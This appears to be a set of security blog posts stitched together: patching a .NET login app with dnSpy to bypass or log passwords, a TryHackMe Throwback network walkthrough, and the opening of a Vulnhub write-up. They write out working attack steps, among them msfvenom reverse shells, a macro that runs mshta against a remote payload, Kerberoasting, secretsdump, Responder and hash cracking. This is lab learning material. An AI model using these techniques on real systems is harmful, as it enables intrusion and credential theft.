As a quick overview, when a developer writes an application in C#/.NET and compiles it, the compiler generates a file containing what’s known as Intermediate Language (IL) code. IL is a higher-level representation than the native assembly instructions executed by the CPU (jmp, push eax, pop ebx, etc.). The useful part in our case is that a decompiler can reconstruct what it thinks the original code looked like far more easily from IL. The result will not be exactly the same as the original, but it will usually be close enough that you won’t notice much of a difference.
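As an analogy (CPython here, not .NET), Python behaves the same way: source compiles to a higher-level intermediate bytecode, which is exactly the property that makes decompiling back to near-original source feasible.

```python
import dis

# Analogy only: CPython compiles this function to bytecode, and the
# dis module can display that intermediate form -- the same property
# a .NET decompiler exploits with IL.
def check_password(entered):
    return entered == "supersecret"

dis.dis(check_password)  # shows opcodes like LOAD_CONST / COMPARE_OP
```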

As an example of what this looks like, I created a simple C# Windows Forms application in Visual Studio that displays a login prompt and prints a message on submission for whether or not the password was correct.

Basic Windows Forms Application
Invalid password submission
Valid password submission

This is a pretty simple example that just checks whether the string in the text box is equal to a pre-defined string in the code and updates the label text accordingly. For the next step, I just compiled the solution in Visual Studio and copied the EXE it outputs to the desktop.

Application properties

The properties shown here don’t give away too much information about the application, but using the Linux ‘file’ command against it provides something a little more useful. This output tells us it is a 64-bit compiled executable and, most importantly, appears to be written in .NET.

Linux file information for .NET Assembly

For reference, the next image is what most other Windows executables look like when viewed with the file command. In this case, I’m using the standard calc.exe available in every version of Windows.

Linux file information for normal Windows binary

Decompiling the application

Now we can get to the interesting part: decompiling the application. To do this I’m going to use the dnSpy tool found here. The repo has been archived at this point, but it still works perfectly fine for everything we need to do. I’m not going to cover all of dnSpy’s many useful features, only those relevant to this topic. After downloading the last release and unzipping the contents, I can launch the executable and be greeted by the screen below.

Initial window in dnSpy on first load

On the first launch it loads dnSpy.dll and a few other assemblies related to it, but we don’t need those for now and can use the File -> Close All option to remove everything currently loaded.

Closing all current files in dnSpy

Now that we have a blank slate, we can load the target executable, in this case ExampleFormsApp.exe. This can be done by going through File -> Open -> Choose the target file. Once opened, it will show up in the Assembly Explorer along with an associated library or two. We can also see some of the decompiled code on the right hand side when selecting the ExampleFormsApp option in the left-hand pane.

Assembly loaded in dnSpy and decompiled code

From here, we can drill down into the target application until we can see the namespace in use (ExampleFormsApp) and the two classes identified in the application (Form1 and Program). Selecting the ‘Program’ class decompiles the associated code and displays it in the right window, allowing us to see the Main() function for this class. This expanded selection also gives us a list of functions and variables found in this class in the explorer pane, although Main appears to be the only one in this case.

Viewing “Program” class in ExampleFormsApp.exe

This class doesn’t seem to have much information in it, so let’s try the other one, Form1.

Viewing “Form1” class in ExampleFormsApp.exe

Form1 appears to have more going on. At first glance in the assembly explorer we can see several functions and variables displayed and the decompiled code also looks to have more functionality with functions defining actions to take when buttons in the form are clicked. We can also see the simple check performed in the passwordSubmitButton_Click function against the password entered in the form and how it compares the value against the string “supersecret”.

To re-iterate my earlier point that dnSpy doesn’t reproduce the exact same code as the original application, below is the original code I wrote for the same function. The logic is the same and produces the same results, but dnSpy formats the code differently because it is essentially guessing what the original looked like.

Logic to check submitted password in Example App

Editing the decompiled code and recompiling new binary

Now, what if I wanted to make a change to the application without needing to load everything back into Visual Studio and re-compile it? Luckily for us, dnSpy allows you to edit decompiled applications in place and re-compile them back into a new binary. As an example, I’m going to change the password the application is looking for to “hacked” and re-compile the code. To do this I’ll right-click anywhere in the decompiled code window and choose “Edit Class (C#)…”. You could also choose to edit a specific method instead of an entire class, but I’m using the whole class in this case.

dnSpy option to edit existing class of opened .NET file

This opens a new window where we can make direct changes to the code of the decompiled class. I make a single change to the string being checked and then choose compile in the bottom-right.

Editing Form1 class code

This saves our change and brings us back to the original decompiled code window, where the string “supersecret” has been replaced with “hacked”. Lastly, to re-compile our updated code, we choose File -> Save Module.

dnSpy option to save current module as new file

This option opens a new screen with a few options and the filename we want to save the binary to. I’m choosing to save it to “ExampleFormsApp-edited.exe” rather than overwriting the original.

dnSpy options to save file

This gives me two applications on the desktop now, the original and the edited version.

Modified version of ExampleFormsApp saved to desktop

Launching the edited application produces the same GUI window as before with a password prompt. However, if I try the password “supersecret”, we now get an invalid message, whereas the password “hacked” gives the success message.

Modified version of ExampleFormsApp after changing password string
Showing new password is accepted

Other ideas when editing the application

This example shows how easy it is to edit and re-compile a .NET application, but it’s a pretty simple modification. What if the application was more complex and didn’t have a hard-coded string the password was being checked against? We could just edit out the password check altogether so that it returns a success no matter what. In this case I’ve removed the entire if/else block that validates the entered string is correct so that the application displays a success every time the button is clicked.

Removing the logic to validate password

This results in an application where the entered password doesn’t matter at all and could even be blank.

Showing an empty password is accepted

This is cool and all, but what if the password is used to encrypt information within the application and you need the correct one to decrypt it? Bypassing the initial authentication won’t matter if the information still can’t be decrypted. What if we instead added keylogging functionality to the original application, so it saves each password being entered where we can view it later? The image below is the code I added to do just that. I also needed to add another using statement at the top (“using System.IO;”), as the functions I use come from that namespace.

Code added to log submitted password to file

This code does a few things:

  • Defines the path to the log file we want to use
  • Checks if the file already exists
    • If it doesn’t exist, create it and add the submitted password to the file
    • If it does exist, append the submitted password to the file
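The same logic can be sketched in Python for reference (the C# in the screenshot is what actually ships in the binary; the desktop path here is a hypothetical stand-in):

```python
import os

def log_password(password: str, path: str) -> None:
    """Create the log file if needed, then append the submitted password."""
    # Append mode covers both branches of the if/else above: it creates
    # the file when missing and appends when it already exists.
    with open(path, "a") as f:
        f.write(password + "\n")

# Hypothetical location matching the screenshots (a file on the desktop)
log_path = os.path.join(os.path.expanduser("~"), "Desktop", "log.txt")
```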

Recompiling the application one more time and launching it gives the same GUI we expect, once again looking for the string “supersecret” as the password. However, we can also see a new file is created on the desktop after submitting the first password.

Password accepted and log file created

Viewing the contents of the file shows the first invalid login attempt I made, followed by the correct one. There could be additional checks in the code to only write the password when it is correct, but this example still demonstrates the capabilities we have with .NET applications.

Contents of the log file created by application

Closing and other potential ideas

If we have access to overwrite an existing .NET binary with a modified one, there are a variety of other useful things that could be added. In many cases this would require administrative rights to access the original’s location on disk, i.e. C:\Program Files, but it’s not abnormal to compromise a machine and find more interesting things to do with it during post-exploitation.

I’m not going to detail any more in this post, but I will list two potential ideas for this specific app; there are countless others for other applications depending on their functionality and purpose. I haven’t tested either of these personally, but they should work in theory:

  • (Exfiltration) Have the application perform an HTTP request with the submitted password to the attacker’s external server
    • This would avoid needing to write the log file to disk
  • (Credentials) Have the application try to connect to the attacker’s SMB server that is running Responder
    • As the application would likely be running as the current user, this should provide a Net-NTLMv2 hash that can either be cracked offline or relayed to another machine.

TryHackMe – Throwback Network (Part 5 – Corporate.local and TBSEC-DC01)

When we left off last time we had just validated our current domain admin, MercerH, is also able to log into CORP-DC01 as an administrator. I stuck with using RDP to log in for this portion.

Looking around the machine doesn’t turn up anything useful in mercerh’s profile, but a file named “server_update.txt” in the Administrator’s Documents folder is interesting. It appears to be a notice to team members about two web pages hosted on 10.200.14.232 (in my case): mail.corporate.local and breachgtfo.local. There is also a reminder not to link social media or GitHub to company resources, which might indicate something sensitive had been found there in the past.

I edited my hosts file (/etc/hosts) to include these two entries and accessed them through my browser, with FoxyProxy configured to use the same SOCKS proxy settings as proxychains.

Visiting the pages gives us a login page for Corporate webmail.

And a site that appears to function like haveibeenpwned.com where you can search for an e-mail to see if it has been compromised.

I tried a few of our previously discovered credentials on the webmail login with no luck, so we’ll likely have to wait to poke further at that. The e-mail addresses we already have also don’t seem to have any breaches associated with them as they come back with “No Breaches Found”.

As it doesn’t seem like the e-mail addresses we have work for either of these sites, let’s explore the other part of the message, which mentioned social media. The text file had a reminder not to link company resources to GitHub or social media, so let’s see if we can find any of those online. Starting with a simple Google dork limited to results from LinkedIn, we get some hits for the company.

Looking further into that result, we see LinkedIn shows 3 employees for this company: Rikka Foxx, Summer Winters, and Jon Stewart.

I looked through each of these pages, but the one that stood out was Rikka Foxx. She is listed as the lead developer for the company, so if anyone was going to have a GitHub repository, it would likely be her.

I didn’t get any results for GitHub when using Google dorks again, but searching on github.com directly for “throwback hacks” gives us one user result.

Looking at the repos this user has listed, we can see one appears to be for the Timekeep server in use within the company that we’ve already been through.

Checking the commits for this project shows standard entries for adding each file, but there is also a second commit mentioning an update to db_connect.php, a file that sounds like it would potentially have database credentials in it.

Inspecting that commit specifically, we can see the user removed hard-coded credentials for DaviesJ. It looks like this is one of the credentials we had already found from other places, but maybe we can try them against the new device we identified in this domain, CORP-ADT01.

CORP-ADT01 (10.200.x.243)

I can’t reach CORP-ADT01 through my current route setup in Metasploit, so I have to repeat the process: create a payload with msfvenom, create a matching listener in Metasploit, upload/run the file on a device that can reach our target (CORP-DC01 in this case), and use the session it creates to add a new route. I won’t show screenshots of these steps again as I’ve done it a few times, but we end up with a session in Metasploit that can reach CORP-ADT01, and it looks like the credentials we found will give us administrator access.

I looked around the machine for a bit and only found one interesting file. The image below is an e-mail explaining how the e-mail format being used for mail.corporate.local will be changing.

This is important for us, as we already have a list of users for the domain but don’t necessarily know which department each belongs to. Trying the base e-mail domain, or the domain with a wildcard, on the breachgtfo site doesn’t give any results, so it looks like we’ll need a full e-mail address to check. We can speed things up by adding all 5 prefixes listed in this text file to every user we’ve identified so far and writing a quick script to check them against the breach site.

The walkthrough for the network uses a tool called LeetLinked to scrape LinkedIn for any profiles associated with a specific company or domain. In our case, the command below checks for any accounts listed with the throwback.local e-mail domain and the company name of “Throwback Hacks”.

python3 leetlinked.py -e "throwback.local" -f 1 "Throwback Hacks"

Once this is run, it outputs a spreadsheet with the results. These results give us a starting point for e-mails to check for breaches.

However, before we can check for breaches, we need to convert these e-mails to the new format expected on mail.corporate.local, as described in the e-mail update above. There are scripts that can do this for you, but however you do it, you should end up with a list like the one below: every user we found with LeetLinked, expanded into the new format for every department, since we don’t know which user belongs to which department. The @ symbol in each e-mail needs to be replaced with its URL-encoded version (%40) for the script I’m going to use to work correctly.
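As a rough sketch of that conversion (the department prefixes below are placeholders; the real five come from the e-mail found on CORP-ADT01 and aren't reproduced here):

```python
from urllib.parse import quote

# Placeholder prefixes -- substitute the five from the e-mail update
PREFIXES = ["SEC", "IT", "HR", "DEV", "FIN"]

def candidate_addresses(username: str, domain: str = "TBHSecurity.com") -> list:
    """One candidate address per department, with @ URL-encoded as %40."""
    return [f"{p}-{username}{quote('@')}{domain}" for p in PREFIXES]

print(candidate_addresses("jstewart")[0])  # -> SEC-jstewart%40TBHSecurity.com
```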

I wrote a quick Python script to go through each e-mail in this file and make an HTTP request against the breach site, matching the format of the request to what we see happen when searching in the browser.
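My script boiled down to something like the sketch below. The endpoint URL and parameter name are assumptions for illustration; they would need to match the real request captured in the browser's network tab.

```python
import urllib.request
from urllib.parse import quote

BASELINE = 4950  # length of the "No breaches found" response

def is_interesting(body: bytes, baseline: int = BASELINE) -> bool:
    """Flag any response whose length differs from the known no-result size."""
    return len(body) != baseline

def check(email: str, url: str = "http://breachgtfo.local/search?email="):
    # Hypothetical endpoint/parameter -- mirror the real browser request
    with urllib.request.urlopen(url + quote(email)) as resp:
        body = resp.read()
    print(email, len(body), "<-- investigate" if is_interesting(body) else "")

print(is_interesting(b"x" * 4950))  # -> False
```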

The script simply prints out the e-mail being checked and the length of the HTTP response. 4950 is the normal length of a message giving the response of “No breaches found”, so anything other than that number indicates something we should look into. As the script finishes up, we find one e-mail that generates a response length that differs from the norm: SEC-jstewart@TBHSecurity.com.

Checking this e-mail manually for breaches shows us the results and provides a password.

Moving back to mail.corporate.local and trying this e-mail/password combination lets us in, and we find one e-mail waiting. The site appears to mimic Outlook 365, but it’s just a non-interactive clone, displaying only this one message with guest credentials for TBSEC_GUEST.

TBSEC-DC01 (10.200.x.79)

At this point, the last step is to compromise the last machine in the network with these credentials: TBSEC-DC01 (the last domain controller). However, the walkthrough on TryHackMe doesn’t explain how you would have identified there was another DC if their network map didn’t already show it. This might have been something I missed, but I wasn’t able to find a link to it from the two domains we have already been through via trusts, ARP tables, or anything.

Moving on, I was able to RDP into the machine with the guest credentials.

Looking at the users in the domain, we identify one that appears to also be a local administrator on this DC: TBService.

Going through the AD properties of this user shows it has an SPN (Service Principal Name) set, so we can try Kerberoasting it to try and get its password.

I went back to using Impacket for this portion, but there are other tools that do the same thing, like Rubeus. The command below uses our working credentials to request a ticket for any accounts with SPNs set in the domain. Once run, we can see we successfully get the hash for the TBService user.

proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -dc-ip 10.200.14.79 TBSEC_GUEST:"WelcomeTBSEC1!" -request

Back to Hashcat, using the same hash type as our last Kerberos hash (13100), and we get a successful crack for the password “securityadmin284650”.

And finally, back on TBSEC-DC01, we’re able to successfully connect as the TBService user to get administrative rights on the machine, successfully owning the last machine in the network.

I poked around a little on this machine to see if I can go back and find a way that we were supposed to have identified TBSEC-DC01 without using the walkthrough, but still didn’t see anything.

Finishing Up

So that’s the end of this network and this series of posts. Overall, I enjoyed it and learned a few things along the way. The only con I’d call out is the way the walkthrough glosses over how someone would identify certain targets in a real-world situation, where they’re not conveniently provided a network map ahead of time. However, given this is the first network of this type TryHackMe has released, I think Sq00ky and Cryillic did a great job of connecting everything all the way through to create a logical attack path.

Here’s the final network map after everything was completed.

TryHackMe – Throwback Network (Part 4 – TIME and DC01)

At the end of the last post we had taken over Throwback-TIME and dumped the hashes. Now we need to do some more recon on that machine to see if there is anything of interest. Before that, I tried to crack the hash for the “Timekeeper” user, as that account didn’t seem standard. Using hashcat again with mode 1000 for NTLM and the rockyou wordlist, we were able to crack it.

hashcat.exe -a 0 -m 1000 ..\hash.txt ..\rockyou.txt

We can test the credentials by trying to SSH into the Throwback-TIME machine through proxychains (using the route setup in Metasploit from last time).

Now, we can continue looking around the machine. Using netstat, we can get a list of ports the machine is listening on and one stands out that we didn’t see before: port 3306 (MySQL) appears to be listening.

We can also see that there is an xampp directory in the root of the C drive, so the MySQL instance running is likely part of that. As XAMPP needs a way to manage the MySQL database it uses, it includes binaries in its directory, such as C:\xampp\mysql\bin\mysql.exe, which will let us connect directly to the database (assuming we have credentials). I ran into a problem at this point when my SSH connection died and wouldn’t let me re-connect, so I switched to using RDP instead. I used the administrator hash we dumped to connect via WinRM and, from that shell, added the timekeeper user to the Remote Desktop Users group with the following command.

net localgroup "Remote Desktop Users" timekeeper /add

After this, I can use xfreerdp to connect to the machine as the Timekeeper user.

When I try to connect to MySQL, however, we find the password we have for Timekeeper doesn’t work.

Going back to our enumeration of domain users, I remember seeing a user named SQLService, which might have the credentials we need for this database. Many times these SQLService accounts will have an SPN (Service Principal Name) set to associate it with a certain SQL server running and these SPNs can allow us to Kerberoast the account to try and gather its password hash. Using a previous session with PowerView still loaded, we can see this account does have an SPN set.

I’m not going to go into detail about how Kerberoasting works, but in this case I’m going to use the Impacket toolkit again to do it using the “GetUserSPNs.py” script. The command below just needs us to specify valid credentials for any user in the domain, specify the domain controller, and tell it to request a ticket on behalf of any users found.

proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py throwback.local/blairej:7eQgx6YzxgG3vC45t5k9 -dc-ip 10.200.14.117 -no-pass -request

We can see in the image below that it successfully finds the same SPN we saw earlier and then provides us a hash of the Kerberos ticket for the user.

Now, as usual, we just need to pass it over to hashcat to try and crack it. We identify the hash type as 13100 using the hashcat example hashes page again. Running it, we find the hash cracks almost immediately with the password “mysql337570”.

If we go back to our RDP session and try logging into MySQL one more time using this new password we’re able to get in now. Now let’s enumerate what’s in the database.

Looking at the available databases, we see two of potential interest: domain_users and timekeepusers. Looking at domain_users first shows it only has one table named “users”.

Checking the content of that table gives us a list of usernames that we haven’t seen before in our enumeration, so possibly users from another domain.

Looking at the timekeepusers database shows the same single table “users”, but gives us a list of users along with passwords.

Throwback-DC01

With this new information we can turn our focus on attacking the domain controller itself. We know its IP is 10.200.14.117, so let’s try password spraying with some of these new passwords we found combined with our previous list.
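Building the spray list itself is just the cross product of users and passwords. A quick sketch (the entries shown are a small sample, not the full lists):

```python
from itertools import product

users = ["jeffersd", "mercerh"]               # sample of enumerated users
passwords = ["Throwback2020", "mysql337570"]  # sample of collected passwords

# Emit user:password pairs in the format most spray tools accept
pairs = [f"{u}:{p}" for u, p in product(users, passwords)]
for pair in pairs:
    print(pair)
```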

After a little bit, we get a hit on the user JeffersD being able to log into the DC with the password “Throwback2020”.

For simplicity, I used RDP to try the credentials and they successfully give us a session on the domain controller.

Looking at the local administrators for the machine, we can see that our account is not one, but the user MercerH appears to be, which might be useful later.

A little more enumeration of our user’s folders reveals a document named “backup_notice.txt” in the Documents folder that has credentials for the backup account.

Given that an account needs sufficient privileges to successfully back up a server, we can assume the backup account likely has access to dump certain information from the domain controller. It might not be able to log in as an administrator, but we can try another Impacket script, “secretsdump.py”, to remotely dump the domain hashes using the backup credentials.

proxychains python3 /usr/share/doc/python3-impacket/examples/secretsdump.py backup:"TBH_Backup2348!"@10.200.14.117 -dc-ip 10.200.14.117

And it successfully dumped the hashes for all users in the Throwback.local domain, which means we essentially own this domain now. For ease of use and so we don’t have to try and pass the hashes whenever we need them, I copied over just the NTLM portion of each user’s hash to try and crack with Hashcat. Most of the successful cracks were for passwords we already knew about, but “pikapikachu7” was the password for the user MercerH, who happens to be an administrator on the DC.
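secretsdump prints one account per line as domain\user:rid:LMhash:NThash:::, so isolating just the NT portion for hashcat is a small parsing job. A sketch (the sample line is fabricated):

```python
def nt_hashes(dump_lines):
    """Pull the NT hash (4th colon-separated field) from secretsdump output."""
    hashes = []
    for line in dump_lines:
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            hashes.append(parts[3])
    return hashes

sample = ["THROWBACK\\mercerh:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::"]
print(nt_hashes(sample))  # -> ['0123456789abcdef0123456789abcdef']
```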

As my SSH is still being weird and won’t let me connect, RDP again it is. We can see that I’m able to successfully connect using mercerh’s credentials to the domain controller, which means we now have an interactive session with domain admin rights.

We could use the built-in Windows Server AD tools to poke around since we’re in an RDP session, but I prefer PowerView for this portion. I loaded it from my local machine into memory in the RDP session and checked for other domains in the forests, along with any domain trusts our current domain may have with them.

This output tells us there is a second domain named “corporate.local”, which we have a bidirectional trust with, and the main domain controller appears to have the hostname “CORP-DC01”.

We can do a few more enumeration searches for users and computers.

We get a list of users that seems to match the domain_users table we saw in the MySQL database and only two computers in the domain: CORP-DC01 and CORP-ADT01. A quick ping shows the names can be resolved and gives us the IPs of the machines.

Pivoting to Corporate.local domain

I tried to run crackmapexec against CORP-DC01 to verify I could reach it, but it doesn’t appear my current route through Throwback-PROD allows it, as the connection times out rather than being denied. We’ll need to set up a new session in Metasploit and create a route going through Throwback-DC01 instead.

First, I created a new file with msfvenom to move over to my session on the DC.

msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 lport=9999 -f exe -o shell-dc.exe

After transferring the file over and running it, I have a new session in Metasploit for the DC.

I then went back to the autoroute module and used the “delete” CMD setting to remove the current route going through Throwback-PROD. Some errors show up, but the final route command shows we have no current routes set.

Switching the command back to “autoadd” and changing the session to our new one of the DC, running it gives us similar errors, but also shows we now have a new route defined going through Throwback-DC01.

Checking crackmapexec again, we can see this time it successfully connects, but then gives us an explicit logon failure message, so our new route appears to be working.

As we have a bidirectional trust, we should be able to authenticate to the corporate.local DC using an account from the throwback.local domain, such as the one we’re currently using: mercerh. Crackmapexec failed above because it defaulted to using the corporate domain, but when specifying throwback.local, it successfully connects. It even gives the message “Pwn3d” at the end, indicating our user is an administrator.

I’ll end this post here for now and with the next one we’ll move into looking around the Corporate.local network. Here is the current state of the network and new machines we have owned.

Until next time again!

TryHackMe – Throwback Network (Part 3 – PROD and TIME)

Picking up where we left off, we were able to perform some domain recon from the Throwback-WS01 machine and confirm that there are 4 total computers that are part of the throwback.local domain:

  • Throwback-PROD
  • Throwback-MAIL
  • Throwback-TIME
  • Throwback-DC01

We knew about three of these already, but TIME was new to the list. The problem is that our current VPN connection only allows us to access PROD and MAIL due to the firewall configuration. We could regain access to WS-01 as well by sending another phishing e-mail out to the users and setting up a persistence mechanism if the executable is run again.

As sending multiple phishing messages to the users would start to seem suspicious in a real environment, we need to look around for other methods of gaining a reliable foothold. In a real corporate network, one of the easiest ways of collecting credentials can be through abusing NBT-NS/LLMNR poisoning. If a client cannot resolve the name of a workstation or device through DNS, it will fall back to name resolution via LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service). The tool we’re going to use for this is called Responder. At a basic level, it performs the two steps below:

  1. First, it listens for LLMNR (UDP/5355) and NBT-NS (UDP/137) name-resolution queries and, under the right conditions, spoofs a response – directing the victim to our attacker machine instead of the intended device.
  2. Once a victim tries to connect to our machine, Responder will exploit the connection to steal the user’s username and password hash.

To get started, we run Responder.py and provide the interface we want it to listen on. The settings for which type of poisoners/servers to use are controlled through the /usr/share/responder/Responder.conf file, but we’ll use the default configuration for now.
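Starting it is a one-liner — the interface name here is an assumption based on the VPN setup:

```
sudo python3 /usr/share/responder/Responder.py -I tun0
```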

Once started, we can see it is listening on all three name resolution services, along with running fake servers on multiple protocols. After a few minutes, we get a hit from 10.200.14.219 (Throwback-PROD) with the NTLMv2 hash for the user PetersJ.

Now that we have a hash, we can try to crack it with Hashcat, but we need to find out which mode to use for this type of hash. A quick Google search for “hashcat example hashes” gives us their page with a list of every hash type they support, the mode number, and an example of what each looks like. Searching for NTLMv2 shows us that it is mode 5600 and the example hash looks to be in the same format as the one we collected.

I tried just using the default rockyou.txt wordlist first, but it didn’t find anything, so I used the OneRuleToRuleThemAll rule list again and it found the password below: Throwback317.

hashcat.exe -a 0 -m 5600 ..\hash.txt ..\rockyou.txt -r rules/OneRuleToRuleThemAll.rule

Great, so we now have a set of supposedly valid credentials for Throwback-PROD, which is one of the three devices we can access from “outside” the network. Going back to our original nmap scan, we saw SSH was listening on 10.200.14.219, so that will be the easiest method of testing the credentials.

Looks like it works, so now we have easy access to Throwback-PROD. Unfortunately, the user account we connect with isn’t a local administrator this time, but there does seem to be a second account for PetersJ that is an admin (along with BlaireJ who we might be able to pass the hash for from WS-01 if needed).

We need to find a way to escalate our privileges on the machine to administrator before we can move any further. My tool of choice for enumerating this type of information is winPEAS, but SeatBelt is also a good choice, though I’ve found its output to be a bit lengthy. I moved to the AppData temp folder where we’ll have write permissions and downloaded the winPEAS.exe file from my local machine with a quick powershell command.

When run, winPEAS gives nice color-coded output (depending on the type of shell you have) and helps us identify misconfigured services, passwords stored in clear-text, or other common methods that can be used to escalate privileges.

One of the first interesting bits we find is stored autologon credentials for the user BlaireJ.

Trying to SSH in with those credentials now verifies they work.

As BlaireJ is a local administrator on PROD, we can go ahead and use this session to dump the rest of the credentials on the machine, but first I want to transfer the session to Metasploit for easier access to Mimikatz and so we can use it to pivot to the internal network later on.

First, I use msfvenom to create a file called “shell.exe” that, when run, will call back to a listener I will create in Metasploit.

Next, I downloaded the created file using powershell into the C:\windows\temp folder on PROD.
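The download step was something along these lines — the attacker IP is a placeholder:

```
powershell -c "Invoke-WebRequest -Uri 'http://<attacker-ip>/shell.exe' -OutFile 'C:\windows\temp\shell.exe'"
```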

Lastly, I start a listener in Metasploit using the same payload as was used to create shell.exe and then run the file on the machine. It launches and we can see we successfully get a meterpreter shell back in the Metasploit console.

To emphasize the dangers of having access to a local admin and the ease of use Metasploit gives us, the screenshot below shows the one command it takes, ‘getsystem’, to go from our current user to NT Authority\SYSTEM if our user is already a local administrator.

Now that I have SYSTEM access, after migrating to an x64 process (our initial payload was only x86) I’m able to dump hashes for the local machine.

Checking for domain credentials using the kiwi module doesn’t show us anything we don’t already have. We get the domain NTLM hashes for BlaireJ and PetersJ, along with the plain-text password for BlaireJ, all of which we already have unfortunately.

I poked around the various user folders on the machine, but didn’t find anything too interesting. However, now that we have a session on PROD we can use it to pivot into the rest of the internal network. The easiest way to do this is to use Metasploit’s “autoroute” and “socks4a proxy server” modules.

To configure the route, we need to use the multi/manage/autoroute module, point it to the session we want to use, and assign the subnet we want to route traffic for. In this case, we want any traffic destined for the 10.200.14.0/24 subnet to be routed through session 1, which is what the final ‘route’ command shows below.

After the route is configured, we use the socks4a proxy server module to make the route usable outside of Metasploit. This module starts a proxy server on port 1080, listening on all interfaces of our local machine.

Lastly, we add the line below to our /etc/proxychains.conf file to configure the type of proxy to use, the address to point it to, and the port to connect over.

With all of these steps done, we can now use the proxychains tool to force certain traffic through our Metasploit session, allowing us access to any devices the Throwback-PROD machine has access to.
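Putting those three steps together, the setup looks roughly like this — the session number is hypothetical:

```
# msfconsole: route the internal subnet through our PROD session
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 10.200.14.0
run

# msfconsole: start the SOCKS4a server on port 1080
use auxiliary/server/socks4a
set SRVPORT 1080
run

# /etc/proxychains.conf: last line of the [ProxyList] section
socks4 127.0.0.1 1080
```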

If we test nmap against port 445 of Throwback-WS01, we can see our first result comes back as filtered, indicating there’s a firewall blocking our scan. When we add proxychains to the beginning of the command and add the -sT flag for a full connect scan (due to how scanning through a proxy works), the port comes back as being open.

Normal Nmap
--------------------
nmap -p 445 10.200.14.222 -Pn -n

Nmap with Proxychains
--------------------
proxychains nmap -sT -p 445 10.200.14.222 -Pn -n

Perfect, now we can access the rest of the devices in the throwback.local domain. Let’s run a quick nmap scan against the two we haven’t been able to look at yet: Throwback-TIME and Throwback-DC01. The scan takes some time to complete, but we can already see that it seems to be working and has identified a few common ports open on both machines.

As they both appear to be listening on port 80 (HTTP) and the full scan will take a while, we should start checking out the web servers. However, we run into a problem: the web browser isn’t sending its traffic through the proxy we configured. We can fix this by configuring a proxy in the browser itself. In my case, I use a Firefox add-on called FoxyProxy that lets you configure multiple proxies and switch between them easily. In the configuration, I define this one as SOCKS4 to match what is being used in Metasploit and point it to the same IP and port we use with proxychains.

Next, I switch to the “Proxychains” entry I just created to enable that proxy. Now any website I visit will go through this proxy server as well.

When we try visiting 10.200.14.176 in the browser now we get a login page for what appears to be a timekeeping web application.

Unfortunately, when we try using the credentials we have already found for BlaireJ or PetersJ, neither work, so this system doesn’t appear to be using domain credentials. If we remember back to the e-mails we found on the webmail portal earlier, there was a message to MurphyF for a password reset that used an address for timekeep.throwback.local.

As we seem to have found the server hosting that site now, we can try using the URL to reset the user’s password. In this case, I will be using the URL below, which should set MurphyF’s password to the word ‘password’.

  • 10.200.14.176/dev/passwordreset.php?user=murphyf&password=password

When submitting the request, we get a page saying the password has been successfully updated along with a flag.

Going back to the login page, we’re now able to login to the site.

The Help & Support option doesn’t do anything, but “Upload time Card” takes us to another page where it seems to want a user to upload an Excel document named “Timesheet.xlsm”.

My first thought was to try uploading a PHP web shell file, but it gets rejected as the site only seems to accept XLSM files.

Since it doesn’t seem like there’s a way around the file type restriction (I didn’t try too hard, so I’m not positive there isn’t), let’s try another tactic. As this network has simulated user behavior in other parts, maybe there is some here as well. Let’s try making a malicious Excel document that will call back to our machine to give us a reverse shell.

First, I’m going to use the ‘hta_server’ module in Metasploit to create a malicious HTA (HTML Application) file and host it for us. We set the correct listening interface for the server and payload then run it to get the URL for the malicious file. This module also starts a Metasploit listener, so we don’t have to worry about starting one of those separately.

Now, we move over to a new Excel document named Timesheet.xlsm (to match what the website expects) and add a macro. For reference, I did this in Excel, but you may be able to do something similar in free products like OpenOffice or LibreOffice. I’ve always had problems getting macros to work in both products, but I’m sure there’s a way.

First off we open the document, go to the Developer tab, and click the ‘Macros’ button. If the Developer tab isn’t visible, you may need to enable it first.

Next, we create a new module in the VBA editor to insert our malicious code into. I’m using something basic that just runs a shell command and tries to execute a remote HTA file. The “NotMalicious” function in the code below defines the code to be run when the function is called and “Auto_Open()” defines which functions should be called automatically when the document opens. In our case, we only have one function that will use mshta.exe to try and execute the HTA file being hosted in Metasploit.

mshta.exe http://10.50.12.12:8080/<Metasploit URL>

With the document created, I went back to the web site, uploaded our malicious Timesheet.xlsm, and this time it appears to have worked successfully. The message even says someone will review the timesheet soon, so we just need to wait for someone to open it.

After a minute or so we got a connection back from 10.200.14.176 (Throwback-TIME) and a shell as the Administrator user was opened.

Using the same ‘getsystem’ command as earlier to escalate our privileges to SYSTEM and then migrating to an x64 process, we can now dump the hashes from this machine as well. These hashes look mostly standard, except for the Timekeeper account, which appears to be local to this machine.

I’m going to wrap this post up here for now. In the next one we’ll poke around Throwback-TIME a little more and then move on to taking over the domain controller.

Here’s an updated network map of which devices we currently own and what else we can see.

Until next time!

Vulnhub – Pwnlab: init

Annndddd I’m back. I’ve been busy for the past 1.5 months or so working through the lab machines for the OSCP and will be taking that exam in two weeks. However, I wanted to go back to some of the “OSCP-like” Vulnhub machines listed here for some final preparation outside of the machines provided in the lab range. It might be a separate post altogether eventually, but I have really enjoyed the OSCP material so far. It only took a few days to get through the PDF and videos provided, but the machines in the labs have been great, if a little out of date in places (looking at you Windows Server 2000).

Today I picked the “Pwnlab: init” machine from Vulnhub as it’s supposed to be similar to what is seen on the OSCP. Anyway, let’s get started.

The initial nmap scan for all ports shows 4 ports open: HTTP, 2 for RPC, and MySQL. As RPC isn’t usually very fruitful on its own and MySQL will likely require credentials, we’ll save these for later and check out what’s running on the web server.

The initial splash page says the server is used to upload and share images inside the intranet and has links to pages for Login and Upload.

Clicking through these, we get a standard login page and the upload page states we need to be logged in to be able to use it.

One thing I noticed while looking over these pages is how they seem to be loaded. The page itself seems to stay on / (likely /index or /index.php) and loads the different pages through the parameter “page”.

To check the logic, I tried visiting /login.php and it loads the same page as seen when clicking the Login link on the home page, minus the header with links to other pages. This appears to indicate that the ‘page’ parameter is looking for files with a given name in a directory, appending .php to them, and rendering the content.

While exploring the website, I also started a gobuster session to try and find any hidden directories or files. It came back with the expected list of pages, plus one for config.php. Both /config.php and /?page=config load a blank page, which likely means that the only content in the file is PHP code, which won’t be rendered on the page. Given that the site has a login page and we saw MySQL running on the server, my guess is that this file contains connection information and possibly credentials for the SQL database.

